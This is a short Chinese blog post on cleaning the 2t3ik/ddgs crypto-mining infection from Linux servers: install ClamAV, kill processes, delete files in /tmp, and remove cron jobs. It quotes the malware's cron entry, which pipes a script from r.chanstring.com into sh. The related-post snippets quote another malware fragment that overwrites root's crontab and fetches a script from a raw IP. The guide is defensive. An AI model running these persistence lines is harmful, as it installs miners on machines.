2. 程式人生 > >linux服務被植入挖礦(2t3ik與ddgs)解決方式

linux服務被植入挖礦(2t3ik與ddgs)解決方式

阿新 發佈:2019-02-15

已處理過多臺伺服器,目前沒再被植入挖礦,按照以下步驟可行:

1、安裝防毒軟體ClamAV

2、刪除挖礦植入的程式碼、定時任務

a、檢視佔有記憶體高的程序,

top

b、刪除對應的程序

kill -9 ID

c、刪除tmp下對應的檔案

rm -rf  /tmp/檔案2t3ik與ddgs

e、檢查/var/spool/cron/root 和 /var/spool/cron/crontabs/root 
刪除自動執行命令 
/10 * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh

參考內容:

相關推薦

linux服務植入2t3ikddgs解決方式

已處理過多臺伺服器,目前沒再被植入挖礦,按照以下步驟可行: 1、安裝防毒軟體ClamAV 2、刪除挖礦植入的程式碼、定時任務 a、檢視佔有記憶體高的程序, top b、刪除對應的程序 kill -9 ID c、刪除tmp下對應的檔案 rm -rf  /tm

linux 伺服器植入ddgs、qW3xT.2病毒處理記錄

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "" > /var/spool/cron/root echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.s

智慧一代雲平臺十六:解決Linux伺服器植入木馬總結

【前言】     繼上次Redis伺服器被劫持風暴(高校雲平臺(十三):Redis伺服器被劫持風波)過後十多天後,病毒對我們總是戀戀不捨,又一次的來到我們身邊;有了上次的經驗後,這次處理起來雖然也有些

Linux 遭入侵,進程隱藏排查記錄

基於 etcd https == rgs 刪除文件 dashboard ttr 基本 今天來給大家分享下這兩天遇到的一個問題,服務器被挖礦了,把我的排查記錄分享下,希望能幫到有需要的同學。 問題原因 多臺服務器持續告警CPU過高,服務器為K8s的應用節點,正常情況下CPU

服務器遭遇程序入侵後的處理

服務器安全早上。開發反應對外客戶服務器環境異常空間存儲異常 90個G的空間莫名其妙少了70個GTOP進程異常 多了一個MD和一個BASH為名的進程 分別跑了90-110的cpu感覺像是系統正常進程 由於剛進公司對業務不了解 所以問了開發 開發表示不是正常業務程序,所以百度了進程中的IP地址。發現是一個常見的挖

比特幣如何原理-工作量證明

區塊鏈 比特幣 在區塊鏈記賬原理 一篇,我們了解到記賬是把交易記錄、交易時間、賬本序號、上一個Hash值等信息計算Hash打包的過程。我們知道所有的計算和存貯是需要消耗計算機資源的,既然要付出成本,那節點為什麽還要參與記賬呢?在中本聰(比特幣之父)的設計裏,完成記賬的節點可以獲得系統給與的一定數量的

Hadoop的MapReduce程序卡住job/雲伺服器礦工

本人用百度的雲伺服器搭建叢集學習Hadoop,突然發現Java程序佔用了99%以上的CPU,自己MapReduce沒法執行,卡在job那裡,但是通過kill所有Java程序,重啟Hadoop叢集即可執行一兩次MapReduce。我一度以為是配置出了問題。困擾了我許久,冥冥之中肯定有問題在制約著。經過找大師幫忙

linux服務之nginx-隨筆-2nginx配置站點的三種方式

三種方式: 1.域名  2.埠  3.IP 直接上配置檔案  一.域名  server { listen 80; server_name www.e

linux清除隱藏的程式

排查過程: 1、top檢視,找佔CPU高的程序: 通過按照CPU佔比降序檢視,除了少數幾個程序佔CPU,並沒有發現可疑程式 佔用CPU高的挖礦程式應該是隱藏在某個地方了, 2、使用命令ps -aux --sort=-pcpu|head -10查詢,果然找到了這個程式:

如何使用樹莓派CPU測試成功

1.獲得cgminer原始碼 $ tar -xjf cgminer-2.4.1.tar.bz2 2.安裝依賴包(curses, curl) 請確保你的開發計算機上有curses, curl這兩個庫,如果沒有則需要安裝: # apt-get install bu

區塊鏈學堂——比特幣

10萬+人民幣一枚喲2017,還有三天就要謝幕了,如果要盤點今年最值得投資的標的,恐怕非比特幣莫屬,2017年一整年,比特幣在爭議中不斷螺旋上升,暴漲暴跌,風起雲湧。比特幣就如同高爾基描寫的《海燕》——在烏雲和大海之間,像一道黑色的閃電在高獓的飛翔,一會兒翅膀碰著波浪,一會箭

阿里雲伺服器程式minerd入侵的終極解決辦法

歡迎掃碼加入Java高知群交流       突然發現阿里雲伺服器CPU很高,幾乎達到100%,執行 top c 一看,嚇一跳,結果如下: 3798 root 20 0 386m 7852 1272 S 300.0 0.1 4355:11 /tm

《鳥哥的Linux私房菜-基礎學習篇第三版

shell 怎樣學習 track col 網絡基礎 環境的使用 發生 企業網 clas 第2章 Linxu怎樣學習 1. Linux當前的應用角色 當前的Linux常見的應用可略分為企業應用和個人應用雙方面。 首先談了企業

Linux中tty是什麽tty1~7

是什麽 管理 打印機 現在 字符型 發送信息 ctrl+alt ctrl+ 設備 tty:終端設備的統稱。 tty一詞源於Teletypes,或者teletypewriters,原來指的是電傳打字機,是通過串行線用打印機鍵盤通過閱讀和發送信息的東西,後來這東西被鍵盤與顯示

Linux中Centos7下安裝Mysql更名為Mariadb

sys img mage 大小寫 alt utf image bsp 啟動服務 一、安裝:   yum install mariadb-server mariadb 二、啟動服務:   systemctl start mariadb 三、配置大小寫敏感問題、和字符為

Linux系統備份還原工具2TAR/壓縮工具

file 將在 ubunt 決定 mmu import zip2 comm 文件和目錄 相比DD備份還原工具,TAR壓縮還原工具更加小巧和靈活,但是不能備份MBR。當然可以通過重新安裝GRUB來解決MBR的這一問題。同時,TAR的做法也是官方推薦的。 註意:一個硬盤啟動時

企業分布式微服務雲SpringCloud SpringBoot mybatis 二十一構建restful API

tis lis bind strong img tro entity 數據源 host 引入依賴 在pom文件引入mybatis-spring-boot-starter的依賴: <dependency> <groupId>o

企業分布式微服務雲SpringCloud SpringBoot mybatis 二十七集成spring cache

state tee comm fin 發現 oid actor lis home 創建一個book數據訪問層 先創建一個實體類 public class Book { private String isbn; private String title; public

企業分布式微服務雲SpringCloud SpringBoot mybatis 二十五集成swagger2構建Restful API

sel ima eth syn conf ring 但是 batis 關註 一、引入依賴 <dependency> <groupId>io.springfox</groupId> <

企業分布式微服務雲SpringCloud SpringBoot mybatis 二十四用spring Restdocs創建API文檔

str () 分布式 ava 顯示 網站發布 shu this 過程 Restdoc,通過單元測試生成api文檔 restdocs是通過單元測試生存snippets文件,然後snippets根據插件生成htm文檔的。 建一個單元測試類: @RunWith(SpringRu